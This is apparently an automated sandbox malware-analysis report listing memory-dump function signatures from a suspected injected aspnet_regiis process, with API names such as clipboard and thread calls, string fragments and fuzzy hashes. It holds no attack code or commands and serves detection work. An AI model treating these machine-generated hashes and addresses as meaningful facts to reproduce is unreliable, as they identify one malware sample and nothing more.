                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: 37aefcd441b1901093ad89667932b8004e0dca898b3e280927998cd1892be203
                                                                                          • Instruction ID: ac8007a0ab11515864a4968a8232bf94a0a85fa9d8f3121474c8912c73ff2433
                                                                                          • Opcode Fuzzy Hash: 37aefcd441b1901093ad89667932b8004e0dca898b3e280927998cd1892be203
                                                                                          • Instruction Fuzzy Hash: EA21E1BAA0D3808BD358DB28C49439BBBD2ABD8710F1DCC6DD4D887380DBB584468B53
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0317B691,00000000,00000001), ref: 031AD7D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 8a347fedb7e0cdedca53d235f912c44368465c668af6173c767ac75333106659
                                                                                          • Instruction ID: fed9ade2623f75cebf073b24ea7d383dd5dffd3da140f22c5be61873c052fd23
                                                                                          • Opcode Fuzzy Hash: 8a347fedb7e0cdedca53d235f912c44368465c668af6173c767ac75333106659
                                                                                          • Instruction Fuzzy Hash: 4BF0E53A558B90EBC619EF2CBC04E973678EF8E622F024831E504DB114F730D882C6B1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: d0b1436feac7a5b2d3c1f80ea31f399da8f8fed136407d11aad9b3f75a660725
                                                                                          • Instruction ID: 8c1e1c6e59bb8cf5fe9056834d6073f93b785eff1ad33dca377478e1fc897df1
                                                                                          • Opcode Fuzzy Hash: d0b1436feac7a5b2d3c1f80ea31f399da8f8fed136407d11aad9b3f75a660725
                                                                                          • Instruction Fuzzy Hash: 94F01DB46083418FE354DF55C4A475ABBE5FB88304F01881DE495CB344DBB5A659CF81
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 3f9c44dd3eeb412dc258202961f44561890e677b759986915467a9e43a83ba0d
                                                                                          • Instruction ID: 7615ced773680e571548fe71a3f77e2f923f72687680c3fc1e2316c1c1df6a8f
                                                                                          • Opcode Fuzzy Hash: 3f9c44dd3eeb412dc258202961f44561890e677b759986915467a9e43a83ba0d
                                                                                          • Instruction Fuzzy Hash: C3F098B4508301DFE354DF24D1A871ABBE4AB88704F00490CE5E98B391D7B6A548CF82
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,031AD7EB,?,0317B691,00000000,00000001), ref: 031ABDC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 62af61d1117cfeaf32fc06e83e78a53f2bdc46ce82c2620f27e877174bd72732
                                                                                          • Instruction ID: a30737538d52dc4ebacae588101177a0815a5679aa443845b2e9afbb71a318a0
                                                                                          • Opcode Fuzzy Hash: 62af61d1117cfeaf32fc06e83e78a53f2bdc46ce82c2620f27e877174bd72732
                                                                                          • Instruction Fuzzy Hash: 0ED01735418621EBCB243F28B8106863A65EF0D222F0608A1E2405A0A8D7319C93CAB0
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0317CDA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: 31a2462f919ca5efb4a04bcd261dd30a4b4281d7bff9afd10071cb80770b2626
                                                                                          • Instruction ID: 6a684ceaa0215872f329f303e5c7d20e293746561bbaa0be1cc0030ecc43168b
                                                                                          • Opcode Fuzzy Hash: 31a2462f919ca5efb4a04bcd261dd30a4b4281d7bff9afd10071cb80770b2626
                                                                                          • Instruction Fuzzy Hash: 99D0C9343D43417BF5786608AC53F103B12670AF59F700604B362FE2C4DAE07150862C
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 031AD99F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: 0fcbc647b079328d13e949bf17e7956f3519ad57efe550eb8bca306de5246f4a
                                                                                          • Instruction ID: e7e042751b942ec419e55a223cfd15faeef38edd23110daf546c00083c3fdfc2
                                                                                          • Opcode Fuzzy Hash: 0fcbc647b079328d13e949bf17e7956f3519ad57efe550eb8bca306de5246f4a
                                                                                          • Instruction Fuzzy Hash: 16D017B8A003409BC618FF28E88642037A4BB1E2053041829E613C7359EA36D992CE32
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,C9C83C46,1875303D,0317882D,C9C83C46), ref: 031ABD80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 1b929ef219011b6e0c22aee38d70fc8dae0fe59737825bbc855e65bc107de7e1
                                                                                          • Instruction ID: 5aba21e0dc1f80f80ff3f2724616d3ca180a6403d393e7a4819bf05abf252fc6
                                                                                          • Opcode Fuzzy Hash: 1b929ef219011b6e0c22aee38d70fc8dae0fe59737825bbc855e65bc107de7e1
                                                                                          • Instruction Fuzzy Hash: 2EC04839155220ABCA246A18EC08BCA3E69AF4D662F020891B4046A0B48760AC92CAA4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                          • String ID: g
                                                                                          • API String ID: 2832541153-30677878
                                                                                          • Opcode ID: 82dd7fa52c6e99875f8768552a58f0fc019e1fbd15f1c4ec84889670e730b2bc
                                                                                          • Instruction ID: 8b8a3990ea58812ae7e7e727166491930b429e2f9656d5b198cd35be294a1e48
                                                                                          • Opcode Fuzzy Hash: 82dd7fa52c6e99875f8768552a58f0fc019e1fbd15f1c4ec84889670e730b2bc
                                                                                          • Instruction Fuzzy Hash: A251AF7550C7818FD314EFBC898935EBEE19B8A220F094E2DE4E5872D1E7748589C7A3
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,8E48886E), ref: 03193BB7
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,8E48886E,8E48886E), ref: 03193C44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: GD$uw$y{
                                                                                          • API String ID: 237503144-3441165588
                                                                                          • Opcode ID: 0289cbbf1345c76fa717d2a62721711f465a1c4e8f3d58e2cc3708bf3de0241e
                                                                                          • Instruction ID: 70bacc67ee3771615f593ce5c356753e20622adabc903386068ea34d49e915fc
                                                                                          • Opcode Fuzzy Hash: 0289cbbf1345c76fa717d2a62721711f465a1c4e8f3d58e2cc3708bf3de0241e
                                                                                          • Instruction Fuzzy Hash: 00A145B5A043049FEB14CF69DC827AEBBB5FF88304F14852DE525AB385E7349506CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: i-i/$uw$y{
                                                                                          • API String ID: 0-2067557706
                                                                                          • Opcode ID: 862ce6f25811d5cdadc07096990a123aeb2806eedf0dcf76cd0dd7cb2fb17733
                                                                                          • Instruction ID: c8791ab0ac314dad1a150b04f6712d44c181acfddc2c6ae7bd7e0047d9444986
                                                                                          • Opcode Fuzzy Hash: 862ce6f25811d5cdadc07096990a123aeb2806eedf0dcf76cd0dd7cb2fb17733
                                                                                          • Instruction Fuzzy Hash: CA915372A183009FD7288F68DC427ABB7E5EB89314F044A3EE569CB3C1E77498058B91
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: %$3$=$A$B$C$E$G$K
                                                                                          • API String ID: 1927566239-1830440523
                                                                                          • Opcode ID: f4ca07e78f27c91b63a86bddd253640ab1ed238c25bd5397b9b27e0822fa2af8
                                                                                          • Instruction ID: bb948571d4fc691bebceb5b1367ae610e8775be87eb2e7a7f6609a32ea6a0e21
                                                                                          • Opcode Fuzzy Hash: f4ca07e78f27c91b63a86bddd253640ab1ed238c25bd5397b9b27e0822fa2af8
                                                                                          • Instruction Fuzzy Hash: 9F51C1B5208B808FD715DF3CC895756BFE1AF5A304F08899DC49ACB386D678E909CB15
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID: %$3$=$A$B$C$E$G$K
                                                                                          • API String ID: 1927566239-1830440523
                                                                                          • Opcode ID: c6cd73690a6489dad37fa436ed54047155cc09fbde3606e90f9ae139bc2bb543
                                                                                          • Instruction ID: bba35c501226fc313ae32c30011ac43f71edc3fe28a00dd5a9e3bbe4b7321820
                                                                                          • Opcode Fuzzy Hash: c6cd73690a6489dad37fa436ed54047155cc09fbde3606e90f9ae139bc2bb543
                                                                                          • Instruction Fuzzy Hash: 884179B1208B808FD715DF38C899756BBE1BB99304F08899DD4DA8B386D7B4A504CB26
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(4FD74DDC,00000000,00000800), ref: 0319E369
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: 5U2W$k\h1$|}$y{
                                                                                          • API String ID: 1029625771-1906802574
                                                                                          • Opcode ID: 08880b370dd418913225ae65225e0b1e44c9cf8a4a3b4c20955e8b6c4ff6b10d
                                                                                          • Instruction ID: 47e48812a2ad9a21ed7bf6abf0aa738d99c40dc6fdcf36790b771dbbcb372a99
                                                                                          • Opcode Fuzzy Hash: 08880b370dd418913225ae65225e0b1e44c9cf8a4a3b4c20955e8b6c4ff6b10d
                                                                                          • Instruction Fuzzy Hash: D7412A7395C7908BD338CE25C841396FBE6ABD8300F1EC96DC4CD9B645CB7848018B82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: uw$y{
                                                                                          • API String ID: 0-756344669
                                                                                          • Opcode ID: 1462e960e6b9a57140a96572143ecc5dc2f502e4d7df07c226d345387dd292b3
                                                                                          • Instruction ID: aa74b38439b2ac51840b56c220cbe3932a24d4acf132239ed21acb3ffcac4711
                                                                                          • Opcode Fuzzy Hash: 1462e960e6b9a57140a96572143ecc5dc2f502e4d7df07c226d345387dd292b3
                                                                                          • Instruction Fuzzy Hash: 5E511375604300EFEB149F28EC41BAAB7F4FB89314F14492AF5659B2C1E774D446CBA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-3916222277
                                                                                          • Opcode ID: 30ed8bcddfa57fa5ce5396a03b9ea189f1d3b90f7b13df068d16561b4bf2ec51
                                                                                          • Instruction ID: 44777feca9a0430226c75fa5c86694c60f24fc80ea92493c91d589dfa1d67ec2
                                                                                          • Opcode Fuzzy Hash: 30ed8bcddfa57fa5ce5396a03b9ea189f1d3b90f7b13df068d16561b4bf2ec51
                                                                                          • Instruction Fuzzy Hash: C931B2B49183549FDB00EF78D98460EBBF4BB88304F41492EE498DB355D370A998CB92